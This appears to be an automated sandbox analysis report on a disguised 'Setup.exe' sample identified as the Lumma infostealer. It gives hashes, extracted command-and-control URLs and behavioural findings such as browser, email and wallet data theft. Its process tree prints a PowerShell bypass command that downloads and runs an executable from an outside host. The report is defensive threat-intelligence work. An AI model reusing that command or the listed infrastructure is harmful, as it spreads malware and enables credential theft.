Analysis
-
max time kernel
145s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
01/03/2025, 12:53
Static task
static1
Behavioral task
behavioral1
Sample
πΌπ©ππβ³ππΈπΉπβ¨πΞ±ΟΒ’Π½-πnstπΆll@9192/Setup.exe
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral2
Sample
πΌπ©ππβ³ππΈπΉπβ¨πΞ±ΟΒ’Π½-πnstπΆll@9192/Setup.exe
Resource
win11-20250217-en
Behavioral task
behavioral3
Sample
πΌπ©ππβ³ππΈπΉπβ¨πΞ±ΟΒ’Π½-πnstπΆll@9192/Setup.exe
Resource
win7-20240903-en
General
-
Target
πΌπ©ππβ³ππΈπΉπβ¨πΞ±ΟΒ’Π½-πnstπΆll@9192/Setup.exe
-
Size
168KB
-
MD5
aef6452711538d9021f929a2a5f633cf
-
SHA1
205b7fab75e77d1ff123991489462d39128e03f6
-
SHA256
e611a1ffbe9e08a2660bc290a581aa0b54637524aaf6040a70e54f97136ce5ac
-
SHA512
7ad84d4d3bab3f5a3e14f336d8931bf4b876299000081b2a94a3fcf698c56b82514753b483c5b8d7ae84ddd92ee1c4043fa5e7fb7c4f7e9eb52ca8c794e508b7
-
SSDEEP
3072:+CNUaViEqjY1uimO3soWBgZNENeo0TzSCOtCUon/BA2gGaA44:dwEq7HO8ohEsxHSC+CUO/Bxk4
Malware Config
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 764 powershell.exe -
pid Process 764 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3960 Caller.exe -
Loads dropped DLL 1 IoCs
pid Process 2768 Lawai.com -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 pastebin.com 10 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4356 set thread context of 3376 4356 Setup.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Caller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lawai.com -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4356 Setup.exe 4356 Setup.exe 4356 Setup.exe 4356 Setup.exe 3376 more.com 3376 more.com 2768 Lawai.com 2768 Lawai.com 2768 Lawai.com 2768 Lawai.com 764 powershell.exe 1056 powershell.exe 4916 powershell.exe 764 powershell.exe 1056 powershell.exe 4916 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4356 Setup.exe 3376 more.com -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4916 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 764 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4356 wrote to memory of 3960 4356 Setup.exe 82 PID 4356 wrote to memory of 3960 4356 Setup.exe 82 PID 4356 wrote to memory of 3960 4356 Setup.exe 82 PID 4356 wrote to memory of 3376 4356 Setup.exe 83 PID 4356 wrote to memory of 3376 4356 Setup.exe 83 PID 4356 wrote to memory of 3376 4356 Setup.exe 83 PID 4356 wrote to memory of 3376 4356 Setup.exe 83 PID 3376 wrote to memory of 2768 3376 more.com 85 PID 3376 wrote to memory of 2768 3376 more.com 85 PID 3376 wrote to memory of 2768 3376 more.com 85 PID 3376 wrote to memory of 2768 3376 more.com 85 PID 3376 wrote to memory of 2768 3376 more.com 85 PID 2768 wrote to memory of 4916 2768 Lawai.com 87 PID 2768 wrote to memory of 4916 2768 Lawai.com 87 PID 2768 wrote to memory of 4916 2768 Lawai.com 87 PID 2768 wrote to memory of 1056 2768 Lawai.com 89 PID 2768 wrote to memory of 1056 2768 Lawai.com 89 PID 2768 wrote to memory of 1056 2768 Lawai.com 89 PID 2768 wrote to memory of 764 2768 Lawai.com 91 PID 2768 wrote to memory of 764 2768 Lawai.com 91 PID 2768 wrote to memory of 764 2768 Lawai.com 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\πΌπ©ππβ³ππΈπΉπβ¨πΞ±ΟΒ’Π½-πnstπΆll@9192\Setup.exe"C:\Users\Admin\AppData\Local\Temp\πΌπ©ππβ³ππΈπΉπβ¨πΞ±ΟΒ’Π½-πnstπΆll@9192\Setup.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Users\Admin\AppData\Roaming\XXX\GGFCBEFKQTKF\Caller.exeC:\Users\Admin\AppData\Roaming\XXX\GGFCBEFKQTKF\Caller.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3960
-
-
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\ProgramData\Lawai.comC:\ProgramData\Lawai.com3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\B6ZS0CPMTMN319BPARX.ps1"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\JQLXWVOSYZ4PC4Z6G1259PP0S4K.ps1"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass $Response = Invoke-WebRequest -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' -Uri 'https://myspecialdot.com/api/download' -UseBasicParsing $TempFile = [System.IO.Path]::GetTempFileName() $FilePath = "$($TempFile).exe" [System.IO.File]::WriteAllBytes($FilePath, $Response.Content) Start-Process -FilePath $FilePath4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
921KB
MD53f58a517f1f4796225137e7659ad2adb
SHA1e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA2561da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634
-
Filesize
1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
Filesize
15KB
MD5472abc68cf7d7e8247dbba4b93bd7631
SHA11853b2d43cc4ef4ad5fbad5da55d402bd2b4934b
SHA25665b2e0c5b527fc000830dc35086e1c93881bd700d857e542fdc6156212fe7c13
SHA5122b37e18a0cdaafaadce45ca1227cafbe2c24b3c83d0f8d56a047da662dd2b6de71fc13924e6a102a146905c617d182e9e618d13b56788813f18846be3400ab26
-
Filesize
19KB
MD59b18cd4d6c2faa38ebc8a17b3a6981c0
SHA1836031792b62410e1941c4888256b0c311ce64ff
SHA2565c9412caf98bc624e6b8e08c07cf925f094cf76a98f4f9347cef688dbdf2059b
SHA51260e014799e6dc48033a36a815a21d7030707785fa2fa1d1f6ab678ff23f1082a4fd71b827ded0470cfc1371100db1e7c55973be690044564c66599b89b69d06a
-
Filesize
6.1MB
MD50e6bf39b4fb446a59fee31f14ae84484
SHA1ce7dd22511dfccc2cae21922cd08fc1a04bfbb66
SHA256e2f5f856df7b242063bef9e5fd211ef79ec6db66c2dc0f32e05dee11d36c1e28
SHA512e0010be3121a2c89bf6abfcd30606c85d7056d85246bd4d8725967eb118137ea4cb11953084789279e848dbad696627d3eab3d44605358ac6201105d8920bad0
-
Filesize
3KB
MD59ef303f48303b543c7dea68f560fe795
SHA15a6f91757e10df8f07077ec9ab463f0f67bb582f
SHA256464507f2c132da0b5aaa45f95372871dd14c42d1a156ac746f602aa41ccfbb2e
SHA5127f16fbfac763bb940fab1083a990c0b1527c3e9e38276e8c1cb13b3622c6b426f129d6c79d7d42cffe5ec7e3490f0afef41a154c85baf503b3b27b26f8e66f0d
-
Filesize
474B
MD5108a846fce8e14bec7a3a8c2850d8ed1
SHA144075cdd5403feadd753986ce39fbc672ca9c69a
SHA256300c5bfa2b54a6c48fb592ba9f2a164dc92d796688f3e43112e696e68a09ed88
SHA512c2f03dad5d470b779de7e2fe36e26c3b112b4f82db76cd5ebd30da71649f1f26326db0632b1dc2bcbe7b80804d4dc8d878b058ce9798bd5d35b722212f6c78da
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.2MB
MD52018644aac84a2de8a767ec1da19993e
SHA14ec18507a02d88f49a089851e773c082327ffa42
SHA256d2251490ca5bd67e63ea52a65bbff8823f2012f417ad0bd073366c02aa0b3828
SHA5124b171ce616756ace308b61d3d2cc43ced952ce4dc04360ab18499cc959cbf08dc5331610f7bb59c34fcdcb72694b455dc556757cba4cb1ed17b78503bcc26c48